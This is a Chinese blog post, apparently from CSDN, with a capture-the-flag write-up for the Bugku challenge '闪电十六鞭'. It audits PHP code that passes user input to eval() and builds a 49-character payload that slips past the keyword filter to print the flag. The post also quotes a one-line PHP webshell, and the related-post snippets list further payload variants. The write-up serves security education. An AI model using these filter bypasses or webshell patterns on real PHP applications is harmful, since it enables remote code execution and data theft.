Bugku CTF 每日一题 闪电十六鞭

最新推荐文章于 2024-03-31 20:22:27 发布
最新推荐文章于 2024-03-31 20:22:27 发布
阅读量1k 收藏 6
点赞数 2
分类专栏: ctf 文章标签: php linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42263820/article/details/122526424
版权

闪电十六鞭

点开发现出现源码

 <?php
    error_reporting(0);
    require __DIR__.'/flag.php';

    $exam = 'return\''.sha1(time()).'\';';

    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }

    echo '<hr>';

    highlight_file(__FILE__);

这直接就开始审计了

error_reporting(0); 可略过
require __DIR__.'/flag.php';
_DIR_是php5.3以后的一个魔术常量,用于指向当前执行的PHP脚本所在的目录
require就是文件包含函数 那意思就是包含flag.php
——————————————————————————————————————————————————————————
    $exam = 'return\''.sha1(time()).'\';';
    定义exam的值 其中sha1(time())表示获取当前时间的sha1散列值
    (所以点击超链接后f12看一下,然后刷新你会发现每一秒的flag值都不一样)
——————————————————————————————————————————————————————————
    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    isset判断flag变量是否不为空
    !isset判断是否为空 为空则输出下面的代码
    (所以会看到一个click here,点击就会提交一个flag的参数(按f12去看),这个flag参数取exam的值,所以会通过下一个if
    但是最后一个else过不了所以会显示马老师发生什么事了)
——————————————————————————————————————————————————————————
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    判断提交的flag参数长度是否跟exam参数长度相等 相等则通过 否则提示长度不允许
——————————————————————————————————————————————————————————
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    一堆正则,匹配flag的值 如果前两个if通过的话如果里面有相应的则输出关键字不允许
——————————————————————————————————————————————————————————
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
将flag的sha1散列值和flag的值进行强比较,如果相同则返回flag
eval函数用于计算或执行参数,所以里面的===才会执行

所以初始思路是找sha1的碰撞 但是flag的值要和exam的值长度相等,而且exam的值是随时变化的。

不过发现有个eval函数 这个函数会导致任意代码执行,也就是常见的一句话木马<?php eval($_POST[cmd])?>
因为echo被禁了,所以该怎么构造flag的值呢?

看了一下其他人的wp,发现可以用<?=$flag?>代替 <?php echo $flag; ?>

因为传的exam的长度是49,所以构造payload的长度也要是49 (这个看上面的按f12那步,数一下长度就行)
然后不要出现被正则的内容就行。

于是可以构造

$hack=mlag;$hack{0}=f;111111111111;?><?=$$hack;?>
解释:
1.因为flag被禁了,所以可以用hack{0}=f来替换hack变量的第1个字母,所以被替换成flag
2.然后$$hack 代表$($hack)相当于$flag(因为hack变量的值后面变为flag)
3.<?=$$hack;?>代表<?=$flag;?> 就相当于<?php echo $flag; ?>
这样就输出了flag的值,最终得到了flag
彼岸花苏陌
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
根据所提供的文件内容,我们可以得知,这是一个针对“bugku ctf misc wp.pdf”文件的CTF(Capture The Flag)比赛中的misc(杂项)类别题目的write-up(解答过程记录)。Misc类别通常包含各种非传统类型的题目,要求...
[bugku]-闪电十六
weixin_52116519的博客
03-30 658
==============================简化源码============================== 1、strlen($_GET['flag']) != strlen($exam) flag变量长度为49 2、flag过滤了 '/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is' 3、(eval($_GET['flag']) === sha1($flag)) 原理 eva.
Bugku 闪电十六
m0_63253040的博客
03-11 911
进入环境,是一串php代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
闪电十六
qq_48511129的博客
01-27 784
这题主要考察分析php代码能力,分析代码构造url,进行过滤 http://114.67.246.176:18660/?flag=a=′fla∗′;a='fla*';a=′fla∗′;a{3}=‘g’;?>11111111111111111;<?=$$a;?>得到flag
二十八、bugku 闪电十六
山兔的博客
09-05 554
php字符对照 &quot=" <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strl
bugku-闪电十六
小诺言的博客
04-05 1499
闪电十六
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
BugKu——闪电十六
qq_52051736的博客
03-08 583
打开题目链接 是一段php代码,应该是代码审计问题,首先分析源码 目标是输出flag变量,所以flag就在flag变量里面 输出条件有三个 flag变量长度等于$exam的长度,长度为49 flag变量不能包含` , “ , . , \ , ( , ) , [ , ] , _ , flag , echo , print , require , include , die , exit ; eval($_GET[‘flag’]) === sha1($flag) 前面两个条件好绕过,就是第三
bugku ctf 闪电十六 <?= ?> 短标签
YouthBelief的博客
03-08 433
0x00 解题须知 在php中 <? ?>和<?= ?>是短标签 而<?php ?>是长标签 其中<?= 是代替 <? echo的 <? ?>代替的是<?php ?> php.ini文件 可以配置php 是否可以解析短标签 0x01 解题 1.1 分析代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.s
BugKu_闪电十六
Kobalos的博客
08-17 1034
访问目标地址 发现了一段php代码,又是代码审计的问题 分析代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } .
bugku web 闪电十六
l181954187的博客
03-31 400
肯定后面是要补全的,
bugkuctf
Vinson的博客
10-16 320
目录 web3 域名解析 你必须让他停下 变量1 网站被黑 web3 不断跳出弹框,用firefox可阻止,chrome没找到,查看源代码 百度查出是Html特殊字符,在Html页面里可输出 域名解析 听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag C:\Windows\System32\drivers\etc找到hos...
bugku ctf 杂项 闪的好快 writeup
sx234com的博客
01-25 1357
访问图片 发现确实闪的很快,想了一下应该可以用photoshop去解决。 不过我想了个其他思路。 将闪动的二维码录成视频,使用的是录屏大师录好以后 保存为avi视频。 然后使用360自带的快剪辑进行编辑。 编辑界面如下 现在就好办了。挨个扫描就出来了。  应该解决的方法有很多,找一种自己熟练使用的软件就可以。 扫描二维码的过程记录。 顺利截取到想要的东西。...
web 闪电十六
m0_57954651的博客
02-23 3813
打开题目启动场景 是一段PHP代码 应该是代码审计问题 首先 分析代码 我的习惯是从目标下手 从目标向上找条件或者说是破绽 再去构造打破破绽的“武器” 这里输出flag的条件有三个 即 长度 flag变量的长度不能等于$exam 关键字 flag变量的长度不能包含 `,“,. ,\ ,( ,),[ ,] ,_ ,flag echo print require include die exit eval($-GET['flag']) === sha1($fl...
ctf刷题小结
quan9i的博客
05-15 6321
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和正则表达式,在CTF比赛中常常会遇到需要处理字符或者利用正则表达式来解题的情况。例如,有些题目会提供一段加密后的字符串,参赛者需要根据加密算法进行解密,获取隐藏在其中的flag。而在其他题目中,可能会给出一段文本,并要求参赛者使用正则表达式来匹配特定的模式或者提取特定的信息。 因此,在BugkuCTF中,对字符处理和正则表达式的理解和熟练应用是非常重要的技能之一。参赛者需要具备对字符编码、字符串操作、基本正则表达式语法等方面的知识,并能够灵活运用这些技巧来解决各种与字符和正则相关的题目。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值